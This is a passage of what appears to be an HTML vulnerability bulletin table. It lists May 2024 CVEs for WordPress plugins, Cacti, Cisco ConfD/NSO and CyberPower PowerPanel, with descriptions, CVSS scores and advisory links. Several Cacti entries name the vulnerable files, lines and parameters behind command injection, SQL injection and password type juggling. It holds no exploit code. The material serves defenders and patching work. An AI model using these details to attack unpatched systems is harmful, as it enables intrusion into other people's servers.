<td>The Spectra Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.1.5. This is due to the plugin allowing lower-privileged users to create registration forms and set the default role to administrator This makes it possible for authenticated attackers, with author-level access and above, to create administrator-level accounts.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3828&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3828" target="_blank">CVE-2024-3828</a><br><a href="https://wpspectra.com/whats-new/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e23e7d66-4b57-4feb-bf77-46238bc6ce7c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>Brainstorm Force--Ultimate Addons for Beaver Builder<br> </td>
<td>Improper Privilege Management vulnerability in Brainstorm Force Ultimate Addons for Beaver Builder allows Privilege Escalation.This issue affects Ultimate Addons for Beaver Builder: from n/a through 1.35.14.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51398&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51398" target="_blank">CVE-2023-51398</a><br><a href="https://patchstack.com/database/vulnerability/bb-ultimate-addon/wordpress-ultimate-addons-for-beaver-builder-premium-plugin-1-35-14-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Brainstorm Force--Ultimate Addons for Elementor<br> </td>
<td>Improper Privilege Management vulnerability in Brainstorm Force Ultimate Addons for Elementor allows Privilege Escalation.This issue affects Ultimate Addons for Elementor: from n/a through 1.36.20.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-50890&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-50890" target="_blank">CVE-2023-50890</a><br><a href="https://patchstack.com/database/vulnerability/ultimate-elementor/wordpress-ultimate-addons-for-elementor-plugin-1-36-20-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Brainstorm Force--Ultimate Addons for WPBakery Page Builder<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Brainstorm Force Ultimate Addons for WPBakery Page Builder allows PHP Local File Inclusion.This issue affects Ultimate Addons for WPBakery Page Builder: from n/a through 3.19.14.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46205&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46205" target="_blank">CVE-2023-46205</a><br><a href="https://patchstack.com/database/vulnerability/ultimate_vc_addons/wordpress-ultimate-addons-for-wpbakery-page-builder-plugin-3-19-14-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Breakdance--Breakdance<br> </td>
<td>The Breakdance plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.7.1 via post meta data. This is due to the plugin storing custom data in metadata without an underscore prefix. This makes it possible for lower privileged users, such as contributors, to edit this data via UI. As a result they can escalate their privileges or execute arbitrary code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4605&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4605" target="_blank">CVE-2024-4605</a><br><a href="https://breakdance.com/breakdance-1-7-2-now-available-security-update/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/095b23b7-71ab-41eb-b666-73df2e1a7eb4?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>By Averta--Shortcodes and extra features for Phlox theme<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in By Averta Shortcodes and extra features for Phlox theme allows PHP Local File Inclusion.This issue affects Shortcodes and extra features for Phlox theme: from n/a through 2.14.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-37888&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-37888" target="_blank">CVE-2023-37888</a><br><a href="https://patchstack.com/database/vulnerability/auxin-elements/wordpress-phlox-core-elements-plugin-2-14-0-unauthenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29895&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29895" target="_blank">CVE-2024-29895</a><br><a href="https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server. The vulnerability is located within the `import_package()` function defined into the `/lib/import.php` script. The function blindly trusts the filename and file content provided within the XML data, and writes such files into the Cacti base path (or even outside, since path traversal sequences are not filtered). This can be exploited to write or overwrite arbitrary files on the web server, leading to execution of arbitrary PHP code or other security impacts. Version 1.2.27 contains a patch for this issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25641&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25641" target="_blank">CVE-2024-25641</a><br><a href="https://github.com/Cacti/cacti/commit/eff35b0ff26cc27c82d7880469ed6d5e3bef6210" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, Cacti calls `compat_password_hash` when users set their password. `compat_password_hash` use `password_hash` if there is it, else use `md5`. When verifying password, it calls `compat_password_verify`. In `compat_password_verify`, `password_verify` is called if there is it, else use `md5`. `password_verify` and `password_hash` are supported on PHP &lt; 5.5.0, following PHP manual. The vulnerability is in `compat_password_verify`. Md5-hashed user input is compared with correct password in database by `$md5 == $hash`. It is a loose comparison, not `===`. It is a type juggling vulnerability. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34340&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34340" target="_blank">CVE-2024-34340</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-37x7-mfjv-mm7m" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, a SQL injection vulnerability in `automation_get_new_graphs_sql` function of `api_automation.php` allows authenticated users to exploit these SQL injection vulnerabilities to perform privilege escalation and remote code execution. In `api_automation.php` line 856, the `get_request_var('filter')` is being concatenated into the SQL statement without any sanitization. In `api_automation.php` line 717, The filter of `'filter'` is `FILTER_DEFAULT`, which means there is no filter for it. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31445&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31445" target="_blank">CVE-2024-31445</a><br><a href="https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/lib/api_automation.php#L717" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/lib/api_automation.php#L856" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/commit/fd93c6e47651958b77c3bbe6a01fff695f81e886" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-vjph-r677-6pcc" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, there is a file inclusion issue in the `lib/plugin.php` file. Combined with SQL injection vulnerabilities, remote code execution can be implemented. There is a file inclusion issue with the `api_plugin_hook()` function in the `lib/plugin.php` file, which reads the plugin_hooks and plugin_config tables in database. The read data is directly used to concatenate the file path which is used for file inclusion. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31459&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31459" target="_blank">CVE-2024-31459</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-gj3f-p326-gh8r" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Versions of Cacti prior to 1.2.27 are vulnerable to stored cross-site scripting, a type of cross-site scripting where malicious scripts are permanently stored on a target server and served to users who access a particular page. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27082&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27082" target="_blank">CVE-2024-27082</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-j868-7vjp-rp9h" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cerberus FTP Enterprise--Cerberus FTP Enterprise<br> </td>
<td>Denial of Service (DoS) vulnerability for Cerberus Enterprise 8.0.10.3 web administration. The vulnerability exists when the web server, default port 10001, attempts to process a large number of incomplete HTTP requests.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5052&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5052" target="_blank">CVE-2024-5052</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/resource-consumption-vulnerability-cerberus-ftp-enterprise" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Cisco--Cisco ConfD<br> </td>
<td>A vulnerability in the ConfD CLI and the Cisco Crosswork Network Services Orchestrator CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root on the underlying operating system. This vulnerability is due to improper authorization enforcement when specific CLI commands are used. An attacker could exploit this vulnerability by executing an affected CLI command with crafted arguments. A successful exploit could allow the attacker to read or write arbitrary files on the underlying operating system with the privileges of the root user.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20326&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20326" target="_blank">CVE-2024-20326</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cnfd-rwpesc-ZAOufyx8" target="_blank">ykramarz@cisco.com</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-rwpesc-qrQGnh3f" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco ConfD<br> </td>
<td>A vulnerability in the ConfD CLI and the Cisco Crosswork Network Services Orchestrator CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root on the underlying operating system. This vulnerability is due to improper authorization enforcement when specific CLI commands are used. An attacker could exploit this vulnerability by executing an affected CLI command with crafted arguments. A successful exploit could allow the attacker to read or write arbitrary files on the underlying operating system with the privileges of the root user.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20389&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20389" target="_blank">CVE-2024-20389</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cnfd-rwpesc-ZAOufyx8" target="_blank">ykramarz@cisco.com</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-rwpesc-qrQGnh3f" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Network Services Orchestrator<br> </td>
<td>A vulnerability in the Tail-f High Availability Cluster Communications (HCC) function pack of Cisco Crosswork Network Services Orchestrator (NSO) could allow an authenticated, local attacker to elevate privileges to root on an affected device. This vulnerability exists because a user-controlled search path is used to locate executable files. An attacker could exploit this vulnerability by configuring the application in a way that causes a malicious file to be executed. A successful exploit could allow the attacker to execute arbitrary code on an affected device as the root user. To exploit this vulnerability, the attacker would need valid credentials on an affected device.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20366&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20366" target="_blank">CVE-2024-20366</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-hcc-priv-esc-OWBWCs5D" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>CodeRevolution--Demo My WordPress<br> </td>
<td>Improper Privilege Management vulnerability in CodeRevolution Demo My WordPress allows Privilege Escalation.This issue affects Demo My WordPress: from n/a through 1.0.9.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31290&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31290" target="_blank">CVE-2024-31290</a><br><a href="https://patchstack.com/database/vulnerability/demo-my-wordpress/wordpress-demo-my-wordpress-plugin-1-0-9-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Contemporary Control System--BASrouter BACnet BASRT-B<br> </td>
<td>A vulnerability classified as critical was found in Contemporary Control System BASrouter BACnet BASRT-B 2.7.2. This vulnerability affects unknown code of the component Application Protocol Data Unit. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263890 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4791&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4791" target="_blank">CVE-2024-4791</a><br><a href="https://github.com/isZzzz/BASRT-B_BACnet_Router_Document/blob/main/BASER-B_APDU.pcapng" target="_blank">cna@vuldb.com</a><br><a href="https://github.com/isZzzz/BASRT-B_BACnet_Router_Document/blob/main/BASRT-B_2_CVE_apply.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263890" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263890" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.323630" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Copymatic--Copymatic AI Content Writer &amp; Generator<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic - AI Content Writer &amp; Generator.This issue affects Copymatic - AI Content Writer &amp; Generator: from n/a through 1.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31351&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31351" target="_blank">CVE-2024-31351</a><br><a href="https://patchstack.com/database/vulnerability/copymatic/wordpress-copymatic-plugin-1-6-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Crocoblock--JetEngine<br> </td>
<td>Improper Privilege Management vulnerability in Crocoblock JetEngine allows Privilege Escalation.This issue affects JetEngine: from n/a through 3.2.4.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-48757&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-48757" target="_blank">CVE-2023-48757</a><br><a href="https://patchstack.com/database/vulnerability/jet-engine/wordpress-jetengine-plugin-3-2-4-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Crocoblock--JetFormBuilder<br> </td>
<td>Improper Privilege Management vulnerability in Crocoblock JetFormBuilder allows Privilege Escalation.This issue affects JetFormBuilder: from n/a through 3.0.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-37866&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-37866" target="_blank">CVE-2023-37866</a><br><a href="https://patchstack.com/database/vulnerability/jetformbuilder/wordpress-jetformbuilder-plugin-3-0-8-authenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CyberPower--CyberPower PowerPanel Enterprise<br> </td>
<td>An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3. An unauthenticated remote attacker can access the PDNU REST APIs, which may result in compromise of the application.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32735&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32735" target="_blank">CVE-2024-32735</a><br><a href="https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&amp;fileSubType=FileReleaseNote" target="_blank">vulnreport@tenable.com</a><br><a href="https://www.tenable.com/security/research/tra-2024-14" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>CyberPower--CyberPower PowerPanel Enterprise<br> </td>
<td>A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. An unauthenticated remote attacker can leak sensitive information via the "query_utask_verbose" function within MCUDBHelper.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32736&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32736" target="_blank">CVE-2024-32736</a><br><a href="https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&amp;fileSubType=FileReleaseNote" target="_blank">vulnreport@tenable.com</a><br><a href="https://www.tenable.com/security/research/tra-2024-14" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>CyberPower--CyberPower PowerPanel Enterprise<br> </td>
<td>A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32737&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32737" target="_blank">CVE-2024-32737</a><br><a href="https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&amp;fileSubType=FileReleaseNote" target="_blank">vulnreport@tenable.com</a><br><a href="https://www.tenable.com/security/research/tra-2024-14" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>CyberPower--CyberPower PowerPanel Enterprise<br> </td>
<td>A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. An unauthenticated remote attacker can leak sensitive information via the "query_ptask_lean" function within MCUDBHelper.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32738&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32738" target="_blank">CVE-2024-32738</a><br><a href="https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&amp;fileSubType=FileReleaseNote" target="_blank">vulnreport@tenable.com</a><br><a href="https://www.tenable.com/security/research/tra-2024-14" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>CyberPower--CyberPower PowerPanel Enterprise<br> </td>
<td>A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. An unauthenticated remote attacker can leak sensitive information via the "query_ptask_verbose" function within MCUDBHelper.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32739&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32739" target="_blank">CVE-2024-32739</a><br><a href="https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&amp;fileSubType=FileReleaseNote" target="_blank">vulnreport@tenable.com</a><br><a href="https://www.tenable.com/security/research/tra-2024-14" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>Hard-coded credentials for the CyberPower PowerPanel test server can be found in the production code. This might result in an attacker gaining access to the testing or production server.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32047&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32047" target="_blank">CVE-2024-32047</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>Hard-coded credentials are used by the  CyberPower PowerPanel platform to authenticate to the database, other services, and the cloud. This could result in an attacker gaining access to services with the privileges of a Powerpanel business application.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32053&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32053" target="_blank">CVE-2024-32053</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>CyberPower PowerPanel business application code contains a hard-coded JWT signing key. This could result in an attacker forging JWT tokens to bypass authentication.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33625&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33625" target="_blank">CVE-2024-33625</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>CyberPower PowerPanel business application code contains a hard-coded set of authentication credentials. This could result in an attacker bypassing authentication and gaining administrator privileges.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34025&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34025" target="_blank">CVE-2024-34025</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>An attacker with certain MQTT permissions can create malicious messages to all CyberPower PowerPanel devices. This could result in an attacker injecting SQL syntax, writing arbitrary files to the system, and executing remote code.</td>
<td>2024-05-15</td>
